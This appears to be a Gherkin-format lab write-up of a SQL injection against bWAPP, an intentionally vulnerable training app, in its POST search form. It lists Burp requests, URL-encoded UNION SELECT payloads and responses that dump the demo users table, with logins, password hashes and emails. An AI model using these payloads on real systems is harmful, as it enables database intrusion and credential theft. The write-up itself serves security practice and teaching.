# language: en

Feature: SQL Injection POST/Search
  From system bWAPP
  From the A1 - Injection Category
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  Given the following
  """
  URL: http://localhost/bWAPP/sqli_6.php
  Message: SQL Injection (POST/Search)
  Details:
      - Input text to enter a movie name
      - Table
  Objective: Perform a SQL injection within POST request
  """

Scenario: SQL Injection
  Given the input form
  When I enter a movie name, the table should update with the match
  """
  # Input name: World

  # Table updated with matched movie:
  <tr height="30">
  <td>World War Z</td>
  <td align="center">2013</td>
  <td>Gerry Lane</td>
  <td align="center">horror</td>
  <td align="center"><a href="http://www.imdb.com/title/tt0816711" \
  target="_blank">Link</a></td>
  </tr>
  """
  Then I look at the request on Burp to see how it behaves
  """
  # Burp Request
  POST /bWAPP/sqli_6.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Content-Length: 25
  title=world&action=search
  """
  And I see so far, the injection can be performed on the input or using Burp
  But to make it more easy to inject I will use Burp to check
  """
  # Burp request
  POST /bWAPP/sqli_6.php HTTP/1.1
  ...
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 42

  title=a%27+OR+%27a%27%3D%27a&action=search

  # Injected query: a' OR 'a'='a
  """
  And It returns as response
  """
  # Response
  No movies were found!
  """
  Then I try with another query, this time using UNION SELECT injection
  """
  # Burp request
  POST /bWAPP/sqli_6.php HTTP/1.1
  ...
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 63
  ...

  title=a%27+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7&action=search

  # Injected query: a' UNION SELECT 1,2,3,4,5,6,7
  """
  And I got an error, which indicates this is the way to go
  """
  # Mysql Error as response
  <td colspan="5" width="580">Error: You have an error in your SQL syntax; \
  check the manual that corresponds to your MySQL server version for the \
  right syntax to use near ''' at line 1
  """
  Then I craft another query
  """
  # Injected query: a' UNION SELECT 1,2,3,4,5,6,7 FROM users;#
  """
  And using it on a new request while on Burp
  """
  POST /bWAPP/sqli_6.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 75

  title=UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7+FROM+users%3B%23&action=search

  # Response
  <tr height="30">
    <td>2</td>
    <td align="center">3</td>
    <td>5</td>
    <td align="center">4</td>
    <td align="center"><a href="http://www.imdb.com/title/6" target="_blank">\
    Link</a></td>
  </tr>
  """
  And although it is not an error, the crafted query injected throw something
  Then I replace the numbers for the known names of each column
  """
  # New crafted query to inject
  a' UNION SELECT id,login,password,email,secret,activated,admin FROM users;#
  """
  Then I use it on the POST request during Burp
  """
  # Burp Request
  POST /bWAPP/sqli_6.php HTTP/1.1
  Host: 192.168.56.101
  ...
  ...
  Upgrade-Insecure-Requests: 1
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 112

  title=%27+UNION+SELECT+id%2Clogin%2Cpassword%2Cemail%2Csecret%2C\
  activated%2Cadmin+FROM+users%3B%23&action=search

  # Response
  <tr height="30">
  <td>A.I.M.</td>
  <td align="center">6885858486f31043e5839c735d99457f045affd0</td>
  <td>A.I.M. or Authentication Is Missing</td>
  <td align="center">bwapp-aim@mailinator.com</td>
  <td align="center"><a href="http://www.imdb.com/title/1" \
  target="_blank">Link</a></td>
  </tr>

  <tr height="30">
  <td>bee</td>
  <td align="center">6885858486f31043e5839c735d99457f045affd0</td>
  <td>Any bugs?</td>
  <td align="center">bwapp-bee@mailinator.com</td>
  <td align="center"><a href="http://www.imdb.com/title/1" \
  target="_blank">Link</a></td>
  </tr>
  """
  And that was the way to leak data
